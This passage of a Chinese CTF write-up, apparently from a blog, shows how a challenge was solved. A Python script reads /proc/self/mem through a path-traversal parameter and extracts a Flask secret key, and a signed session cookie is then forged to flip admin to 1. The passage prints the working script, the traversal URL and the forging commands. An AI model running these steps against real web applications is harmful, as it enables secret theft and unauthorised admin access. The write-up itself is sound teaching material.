7f8209000000-7f8209036000 r--p 0005d000 fd:00 23348860 /lib/ld-musl-x86_64.so.1
7f8209036000-7f8209037000 r--p 00092000 fd:00 23348860 /lib/ld-musl-x86_64.so.1
7f8209037000-7f8209038000 rw-p 00093000 fd:00 23348860 /lib/ld-musl-x86_64.so.1
7f8209038000-7f820903b000 rw-p 00000000 00:00 0 
7fff969ea000-7fff96a0b000 rw-p 00000000 00:00 0 [stack]
7fff96a87000-7fff96a8a000 r--p 00000000 00:00 0 [vvar]
7fff96a8a000-7fff96a8c000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

从中寻找开始地址和结束地址并带入/proc/self/men中去查找secret_key，代码如下

import re,requests
line=open(file="maps.text",mode='r')
file_date=line.readlines()

for lines in file_date:
    if 'rw' in lines:
        addr = re.search('([0-9a-f]+)-([0-9a-f]+)', lines)
        start = int(addr.group(1), 16)
        end = int(addr.group(2), 16)
        print(start, end)
        url = f"http://61.147.171.105:59773/info?file=../../../../proc/self/mem&start={start}&end={end}"
        response = requests.get(url)
        secret_key = re.findall("[a-z0-9]{32}\*abcdefgh", response.text)
        if secret_key:
            print(secret_key)
            exit(0)

得到secret_key

1	cff65a3817204001ad76ae1e8cb13484*abcdefgh

接下来伪造flask_session，首先使用工具对cookie值中保存的session进行解密

首先获取请求cookie值eyJhZG1pbiI6MH0.ZYgsLg.pV_q1l7XRYFtpUxbQIMozaQ6H5c

1	python flask_session_cookie_manager3.py decode -s "cff65a3817204001ad76ae1e8cb13484*abcdefgh" -c "eyJhZG1pbiI6MH0.ZYgsLg.pV_q1l7XRYFtpUxbQIMozaQ6H5c"

解密后得到{‘admin’:0}

这里需要将admin的值修改为1，所以需要对其进行加密生成cookie，如下

1	python flask_session_cookie_manager3.py encode -s "cff65a3817204001ad76ae1e8cb13484*abcdefgh" -t "{'admin':1}"

得到session值为

1	eyJhZG1pbiI6MX0.ZYg81w.EwaiU-aGRzeNiuCeME1rBic-cVI

将请求报文中的cookie修改为以上值请求获取flag

1	catctf{Catch_the_c4t_HaHa}

打赏

版权声明： 本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！